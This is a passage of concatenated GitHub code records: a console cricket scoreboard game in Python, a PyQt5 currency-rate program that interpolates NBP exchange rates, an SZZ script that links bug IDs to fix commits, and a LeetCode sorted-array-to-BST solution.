random\n\nclass T2CUP:\n allTeams = []\n def entry_team(self,teamName):\n self.allTeams.append(teamName)\n\n \n\nclass Team(T2CUP):\n def __init__(self, name) -> None:\n 
self.teamName = name\n        self.playersName = []\n        super().entry_team(self)\n    def entry_players(self, player):\n        self.playersName.append(player)\n    def __repr__(self) -> str:\n        return f\"Team Name {self.teamName}\"\n\nclass Player:\n    def __init__(self,name, teamNameObj) -> None:\n        self.playerName = name\n        self.strikeRate = 0.0\n        self.runBat = 0\n        self.usedBall = 0\n        self.fours = 0\n        self.sixs = 0\n        self.runBall = 0\n        self.wicketsTaken = 0\n        self.ballBowld = 0\n        teamNameObj.playersName.append(self)\n    def __repr__(self) -> str:\n        return f\"Form player Obj : {self.playerName}\"\n\nclass Innings:\n    def __init__(self,teamOne,teamTwo,battingTeam,bowlingTeam) -> None:\n        self.teamOne = teamOne\n        self.teamTwo = teamTwo\n        self.battingTeam = battingTeam\n        self.BowlingTeam = bowlingTeam\n        self.totalRun = 0\n        self.totalWickets = 0\n        self.totalOver = 0\n        self.currentBall = 0\n        self.currentBatsmanOrder = 2\n        self.currentBattingList = [battingTeam.playersName[0],battingTeam.playersName[1]]\n        self.striker = battingTeam.playersName[0]\n        self.currentBowler = None\n        self.currentOverStatus = []\n        self.allOverstatus = []\n        self.target = None\n    def show_score_board(self):\n        print(f\"*{self.currentBattingList[0].playerName} - {self.currentBattingList[0].runBat} ({self.currentBattingList[0].usedBall})\", end=\"\\t\")\n        print(f\"{self.currentBattingList[1].playerName} - {self.currentBattingList[1].runBat} ({self.currentBattingList[1].usedBall})\")\n        print(f\"{self.battingTeam.teamName[:3].upper()} Total Run : ({self.totalRun}-{self.totalWickets})W\")\n        print(f\"Overs:({self.totalOver}.{self.currentBall})Ball\")\n        if self.currentBowler != None:\n            print(f\"Bowler Name : {self.currentBowler.playerName} Give runs : {self.currentBowler.runBall} Bowl : {self.currentBowler.ballBowld}\")\n        if self.currentBall > 0:\n            print(\"Current Over - \",end=\"\")\n            for i in self.currentOverStatus:\n                print(i,end=\" \")\n            print(\"\\n\")\n        if self.currentBall == 0 and self.totalOver > 0:\n            print(\"Last Over - \",end=\"\")\n            for i in self.allOverstatus[-1]:\n                print(i,end=\" \")\n            print(\"\\n\")\n        if self.target is not None:\n            print(f\"Target : {self.target}\")\n            if self.target > self.totalRun:\n                print(f\"Need {self.target - self.totalRun} runs from {12 - (self.totalOver*6 + self.currentBall)} balls.\")\n    def entry_bowler(self,bowlerNameObj):\n        self.currentBowler = bowlerNameObj\n\n    def playBowl(self,status):\n        run = 0\n        extraRun = 0\n        isNoBall = False\n        isWide = False\n        willStrikeChange = False\n        isWicket = False\n        if status[0] >= '0' and status[0] <= '9':\n            run = int(status)\n            if run%2 != 0:\n                willStrikeChange = True\n        else:\n            if status[0] == 'W' and len(status) == 1:\n                isWicket = True\n            elif status[0] == 'N':\n                isNoBall = True\n                extraRun = 1\n                run = int(status[1])\n                if run%2 !=0:\n                    willStrikeChange = True\n            elif status[0] == 'W':\n                isWide = True\n                extraRun = 1+int(status[1])\n                if int(status[1]) % 2 == 1:\n                    willStrikeChange = True\n\n        self.totalRun += run + extraRun\n        self.striker.runBat += run\n        if run == 4:\n            self.striker.fours+=1\n        if run == 6:\n            self.striker.sixs += 1\n        if isWide == False:\n            self.striker.usedBall +=1\n        self.currentBowler.runBall += run + extraRun\n        self.currentOverStatus.append(status)\n        if isWide == False and isNoBall == False:\n            self.currentBowler.ballBowld += 1\n            self.currentBall += 1\n            if self.currentBall == 6:\n                self.currentBall = 0\n                self.totalOver += 1\n                willStrikeChange = True\n                self.allOverstatus.append(self.currentOverStatus)\n                self.currentOverStatus = []\n        \n\n        if isWicket == True:\n            if self.totalWickets > 9:\n                
return \"end\"\n print()\n print(f\"Last wicket : {self.striker.playerName}\\t Runs : {self.striker.runBat}\\tPlayed {self.striker.usedBall}'Balls\\tWicket taken by {self.currentBowler.playerName}\")\n print(f\"Strike rate : {self.striker.runBat*100/self.striker.usedBall}\")\n print(f\"Fours : {self.striker.fours}\\tSix's : {self.striker.sixs}\")\n self.currentBattingList[0] = self.battingTeam.playersName[self.currentBatsmanOrder]\n self.currentBatsmanOrder += 1\n self.striker = self.currentBattingList[0]\n self.totalWickets += 1\n self.currentBowler.wicketsTaken += 1\n print()\n\n if willStrikeChange == True:\n self.currentBattingList[0],self.currentBattingList[1] = self.currentBattingList[1],self.currentBattingList[0]\n self.striker = self.currentBattingList[0]\n \n return \"0\"\n \n\n\n\ncup = T2CUP()\n# Team Bangladesh\nbangladesh = Team(\"Bangladesh\")\nTamim = Player(\"Tamim Iqbal\", bangladesh)\nSakib = Player(\"Sakib Al Hasan\",bangladesh)\nMushfiq = Player(\"Mushfiqur Rahim\",bangladesh) \nMustafiz = Player(\"Mustafizur Rahman\",bangladesh) \nLiton = Player(\"Liton Das\",bangladesh) \nMahmudullah = Player(\"Mahmudullah\",bangladesh)\nRubel = Player(\"Rubel Hossain\",bangladesh)\nImrul = Player(\"Imrul Kayes\",bangladesh)\nSoumya = Player(\"Soumya Sarker\",bangladesh)\nAfif = Player(\"Afif Hossain\",bangladesh)\nTaskin = Player(\"Taskin Ahmed\",bangladesh)\n\n# print(bangladesh.teamName)\n# print(bangladesh.playersName)\n\n# Team India\nindia = Team(\"India\") \nKohli = Player(\"Virat Kohli\",india) \nRohit = Player(\"Rohit Sharma\",india)\nDinesh = Player(\"Dinesh Kartik\",india)\nRishabh = Player(\"Rishabh Pant\",india)\nRavichandran = Player(\"Ravichandran Ashwin\",india)\nKl = Player(\"KL Rahul\",india)\nHardik = Player(\"Hardik Pandya\",india)\nShami = Player(\"Mohammad Shami\",india)\nRavindra = Player(\"Ravindra Jadeja\",india)\nBumrah = Player(\"Jasprith Bumrah\",india)\nMs = Player(\"Mahindra Singh Donni\",india)\n\n# match = Innings(bangladesh,india,bangladesh,india)\n# match.show_score_board()\n\n\nwhile True:\n print(\"Select two teams to played\")\n for index, name in enumerate(cup.allTeams):\n print(f\"{index+1}. {name.teamName}\")\n teamOne,teamTwo = map(int,input(\"Enter two teams index : \").split(\" \"))\n teamOne-=1\n teamTwo-=1\n teamOneObj = cup.allTeams[teamOne]\n teamTwoObj = cup.allTeams[teamTwo]\n tossWinTeam = random.choice([teamOne,teamTwo])\n print(f\"{cup.allTeams[tossWinTeam].teamName} Win the toss.\")\n if tossWinTeam == teamOne:\n tossLoseTeam = teamTwo\n else:\n tossLoseTeam = teamOne\n rand = random.choice([0,1])\n if rand == 0:\n print(f\"{cup.allTeams[tossWinTeam]} choice bowling fast.\")\n battingTeamNameObj = cup.allTeams[tossLoseTeam]\n bowlingTeamNameObj = cup.allTeams[tossWinTeam]\n else:\n print(f\"{cup.allTeams[tossWinTeam]} choice batting fast.\")\n battingTeamNameObj = cup.allTeams[tossWinTeam]\n bowlingTeamNameObj = cup.allTeams[tossLoseTeam]\n\n # Fast ininngs start\n fastInnings = Innings(teamOneObj,teamTwoObj,battingTeamNameObj,bowlingTeamNameObj)\n fastInnings.show_score_board()\n print()\n over = 0\n while over < 2:\n isOff = False\n print(\"Choice a bowler : \")\n for index , name in enumerate(bowlingTeamNameObj.playersName):\n print(f\"{index+1}. 
{name.playerName}\")\n bowlerIndex = int(input(\"Enter player index : \"))\n bowlerIndex -= 1\n bowlerNameObj = bowlingTeamNameObj.playersName[bowlerIndex]\n fastInnings.entry_bowler(bowlerNameObj)\n print(\"\\n\")\n\n while True:\n status = input(\"Enter status : \")\n recive = fastInnings.playBowl(status)\n if recive == \"end\":\n isOff = True\n break\n fastInnings.show_score_board()\n if (fastInnings.totalOver*6 + fastInnings.currentBall) % 6 == 0:\n break \n print(\"\\n\")\n over += 1\n if isOff == True:\n break\n print(f\"Target is {fastInnings.totalRun+1}\")\n # Second ininngs start\n battingTeamNameObj,bowlingTeamNameObj = bowlingTeamNameObj,battingTeamNameObj\n secondInnings = Innings(teamOneObj,teamTwoObj,battingTeamNameObj,bowlingTeamNameObj)\n secondInnings.target = fastInnings.totalRun + 1\n over = 0\n while over < 2:\n isOff = False\n print(\"Choice a bowler : \")\n for index , name in enumerate(bowlingTeamNameObj.playersName):\n print(f\"{index+1}. {name.playerName}\")\n bowlerIndex = int(input(\"Enter player index : \"))\n bowlerIndex -= 1\n bowlerNameObj = bowlingTeamNameObj.playersName[bowlerIndex]\n secondInnings.entry_bowler(bowlerNameObj)\n print(\"\\n\")\n\n while True:\n status = input(\"Enter status : \")\n recive = secondInnings.playBowl(status)\n if recive == \"end\":\n isOff = True\n break\n secondInnings.show_score_board()\n if (secondInnings.totalOver*6 + secondInnings.currentBall) % 6 == 0:\n break \n over += 1\n if isOff == True:\n break\n if secondInnings.totalRun >= secondInnings.target:\n print(f\"{secondInnings.battingTeam.teamName} wins.\")\n else:\n print(f\"{secondInnings.BowlingTeam.teamName} wins.\")\n break\n \n\n\n","repo_name":"amitsarker95/Cricket_Board_Management_System_with_Python","sub_path":"cricket_bord_management_system.py","file_name":"cricket_bord_management_system.py","file_ext":"py","file_size_in_byte":9991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"37193877543","text":"# -*- coding: utf-8 -*-\r\n#author: Radosław Schwichtenberg\r\nimport numpy as np\r\nimport sys\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtWidgets import QWidget, QListWidget, QListWidgetItem, QLabel, QPushButton, QGridLayout, QApplication\r\nimport urllib.request, json\r\nimport datetime as dt\r\nimport pylab as plb\r\nimport matplotlib.pyplot as plt # font,wykres\r\nimport matplotlib.patheffects as PathEffects\r\n\r\n#pobranie pliku json i otworzenie go\r\nfile = urllib.request.urlopen('http://api.nbp.pl/api/exchangerates/tables/a/last/10?format=json').read().decode('utf8')\r\nvalues = json.loads(file)\r\n# do obliczen wybrałem 10 ostatnich kursów\r\n#czcionka dla wykresu\r\nplt.rc('font', family='serif', serif='Times New Roman')\r\n#interpolacja-przyjmowanie w pewnym przedziale funkcji znanych wartosci dla danych liczb\r\n#interpolacja wielomianowa metodą Lagrange-a, punkty interpolacji są tam gdzie zielona linia przecina niebieska\r\n#interpolacja wielomianowa metodą Lagrange-a ma na celu przyblizenia danych, Lagrange udowodnił, że wielomian odpowiednio wysokiego stopnia może interpowolować każdy zbiór danych, ale nie zawsze można dobrać taki wielomian \r\ndef interpolacja_lagrange(x, y, xval):\r\n \"\"\"\r\n x - argument funkcji\r\n y - wartość funkcji\r\n xval - wartość interpolowana funkcji\r\n funkcja obliczajaca wartosc interpolowana funkcji yval w punkcie xval\r\n \"\"\"\r\n products = 0\r\n yval = 0\r\n for i in range(len(x)):\r\n products = y[i]\r\n for j in 
range(len(x)):\r\n if i != j:\r\n products = products * (xval - x[j]) / (x[i] - x[j])\r\n yval = yval + products\r\n return yval\r\n#aproksymacja ma za zadanie przyblizenie konkretną funkcje danego zbioru danych\r\n#aproksymacja(ocena na oko,dopasowanie jak z najmniejszym bledem) i wykres\r\ndef swapRows(v,i,j):\r\n if len(v.shape) == 1:\r\n v[i],v[j] = v[j],v[i]\r\n else:\r\n v[[i,j],:] = v[[j,i],:]\r\n \r\ndef swapCols(v,i,j):\r\n v[:,[i,j]] = v[:,[j,i]]\r\n\r\n \r\n#elimacja gaussa->tabela przestawna ,algorytm macierzowy,musielismy przerzucic macierz\r\ndef elimacjagaussa(a, b, tol = 1.0e5):\r\n n = len(b)\r\n s = np.zeros(n) \r\n for i in range(n):\r\n s[i] = max(np.abs(a[i,:]))\r\n \r\n for k in range(0, n-1):\r\n p = np.argmax(np.abs(a[k:n, k])/s[k:n])+k\r\n if abs(a[p, k])1:\r\n j=0\r\n y = [values[i-1]['rates'][a]['mid'], values[i]['rates'][a]['mid']]\r\n x = [i for i in range(len(y))]\r\n xval = [i for i in np.arange(0, 1, 1/relatywnosc_dni)]\r\n yval = []\r\n ytemp = []\r\n print('Interpolacja w dniach: %s - %s:' % (values[i-1]['effectiveDate'], values[i]['effectiveDate']))\r\n for xv in xval:\r\n data = (dt.datetime.strptime(values[i]['effectiveDate'], '%Y-%m-%d')-dt.timedelta(days=relatywnosc_dni-j)).__format__('%Y-%m-%d')\r\n yval.append ('%s:# %.4f\\n' % (data, interpolacja_lagrange(x, y, xv)))\r\n ytemp.append(interpolacja_lagrange(x, y, xv))\r\n j+=1 \r\n for j in range(1, len(yval)):\r\n temp.append(yval[j])\r\n yappr.append(ytemp[j])\r\n temp.append ('%s: %.2f\\n' % (values[i]['effectiveDate'], values[i]['rates'][a]['mid']))\r\n yappr.append (values[i]['rates'][a]['mid'])\r\n else:\r\n yappr.append (values[i]['rates'][a]['mid'])\r\n temp.append ('%s: %.2f\\n' % (values[i]['effectiveDate'], values[i]['rates'][a]['mid']))\r\n print(30*'**')\r\n temp.reverse()\r\n text = ''.join(temp)\r\n self.opis.setText(text)\r\n self.informacja.setText('Kursy wybranej waluty: ')\r\n xappr = [i for i in range(0, len(yappr))]\r\n coeff = polyFit(xappr, yappr, 6)\r\n plotPoly('Kurs '+values[0]['rates'][a]['code'], xappr, yappr, coeff)\r\n\r\n \r\n \r\n\r\n \r\n def wyjscie(self):\r\n app = QApplication(sys.argv)\r\n sys.exit(app.exec_())\r\n \r\n\r\n \r\n\r\nif __name__ == '__main__':\r\n\r\n app = QApplication(sys.argv)\r\n ex = Program()\r\n font=app.font()\r\n font.setPointSize(12)\r\n font.setBold(True)\r\n app.setFont(font)\r\n sys.exit(app.exec_())\r\n\"\"\"\r\nProgram główny:\r\nuruchom pętlę\r\n'app', uruchom\r\nokno 'ex' \r\n\"\"\"\r\n","repo_name":"rk-rada/Exchange-rate","sub_path":"mn_radoslaw_schwichtenberg_18590.py","file_name":"mn_radoslaw_schwichtenberg_18590.py","file_ext":"py","file_size_in_byte":9932,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"31922744441","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 22 14:21:59 2020\n@author: ichraf ben fadhel\n\"\"\"\nimport json\nimport re \n\nimport pandas as pd \nfrom dateutil.parser import parse\n\n\"\"\" this script is used to search for fix commit of issues host in bugzilla (because the format of csv file differt\"\"\"\n\n\n# to reduce the commits in which we search \ndef find_commit_candidats(gitlog_path) :\n commits_candidate=[]\n pattern=\"[Bb][Zz]-\\d+|[Bb][Zz] -\\d+|[Ii]ssue #\\d+|[Ff]ixe[sd]|[Ff]ixe|BZ \\d+|bz \\d+|[Pp][Rr]\\s\\d+|[Bb]ug\\s\\d+|#\\d+|[Bb]ugzilla\"\n \n with open(gitlog_path) as f:\n gitlog = json.loads(f.read())\n \n for commit in gitlog :\n \n if re.search(pattern,commit) is not None :\n 
commits_candidate.append(commit)\n \n return commits_candidate \n\n \ndef commit_selector_heuristic(commits):\n \"\"\" Helper method for find_bug_fixes.\n Commits are assumed to be ordered in reverse chronological order.\n Given said order, pick first commit that does not match the pattern.\n If all commits match, return newest one. \"\"\"\n for commit in commits:\n if not re.search('[Mm]erge|[Cc]herry|[Nn]oting', commit):\n return commit\n return commits[0]\n \n \n \n \n\ndef find_bug_fixes(issue_path, gitlog_path,original_pattern):\n \"\"\" Identify bugfixes in repository given a list of issue gitlog and issue pattern\"\"\"\n \n \n matches_per_issue={}\n no_matches=[]\n issue_list={}\n total_matches=0\n data =pd.read_csv(issue_path)\n commits_candidate=find_commit_candidats(gitlog_path)\n i=0\n \n for bug_id in data['Bug ID']:\n if \"-\" in bug_id :\n nb=bug_id.split(\"-\")[1]\n pattern=original_pattern.replace(\"\\d+\",str(nb))\n \n else :\n pattern=original_pattern.replace(\"\\d+\",str(bug_id))\n \n \"\"\"this pattern mentionned bellow that we used in the projects \"\"\"\n # pattern=\"[Bb][Zz]-\"+str(bug_id)+\"\\s|issue#\"+str(bug_id)+\"|[Bb][Zz] \"+str(bug_id)+\"\\s|[Pp][Rr] \"+str(bug_id)+\"\\s\" #ant\n # pattern=\"Bug \"+str(bug_id)+\"\\s|[Bb]ugzilla Id: \"+str(bug_id)+\" |[Bb][Zz] \"+str(bug_id)+\" \" #jmetter\n # pattern=\"[Bb]ug \"+str(bug_id)+\" \" #pde\n #pattern=\"[Ii]ssue #\"+str(bug_id)+\" |[Ff]ixes #\"+str(bug_id)+\" |\"+str(bug_id)+\" \"#jetty \n \n #pattern=str(bug_id)+\" |\"+str(bug_id)+\" -|\"+str(bug_id)+\"-\"\n \n #pattern=\"\\[\"+bug_id+\"\\]\" #maven\n matches=[]\n \n \n for commit in commits_candidate :\n \n \n if re.search(pattern,commit) :\n \n matches.append(commit)\n \n total_matches += len(matches)\n matches_per_issue[bug_id] = len(matches)\n\n if matches :\n selected_commit = commit_selector_heuristic(matches)\n \n if selected_commit :\n # get commit and issue detail\n issue_list[bug_id]={}\n issue_list[bug_id]['hash'] = re.search('(?<=^commit )[a-z0-9]+(?=\\n)', \\\n selected_commit).group(0) \n issue_list[bug_id]['commitdate'] = re.search('(?<=\\nDate: )[0-9 -:+]+(?=\\n)',\\\n selected_commit).group(0) \n issue_list[bug_id]['resolutiondate'] = re.search('(?<=\\nDate: )[0-9 -:+]+(?=\\n)',\\\n selected_commit).group(0) \n issue_list[bug_id]['creationdate'] =str( parse( data[data['Bug ID']==bug_id]['Opened'].tolist()[0]+\" +0000\" ).strftime('%Y-%m-%d %H:%M:%S %z'))\n\n else :\n no_matches.append(bug_id)\n \n\n else :\n no_matches.append(bug_id)\n i+=1 \n print(\"total issues\"+str(data['Bug ID'].count()))\n print('Issues matched to a bugfix: ' + str(data['Bug ID'].count() - len(no_matches)))\n print('Percent of issues matched to a bugfix: ' + \\\n str((data['Bug ID'].count() - len(no_matches)) / data['Bug ID'].count()))\n\n return issue_list ","repo_name":"anwarghammam/Pfa-Project","sub_path":"szz-result/scripts/szz/find_bug_fix_vbugzilla.py","file_name":"find_bug_fix_vbugzilla.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"12032451350","text":"#\n# @lc app=leetcode.cn id=108 lang=python3\n#\n# [108] 将有序数组转换为二叉搜索树\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n l = len(nums)\n if l == 0:\n return None\n m = l // 2\n return 
TreeNode(nums[m], self.sortedArrayToBST(nums[:m]), self.sortedArrayToBST(nums[m+1:]))\n# @lc code=end\n\n","repo_name":"nerutia/leetcode_new","sub_path":"108.将有序数组转换为二叉搜索树.py","file_name":"108.将有序数组转换为二叉搜索树.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}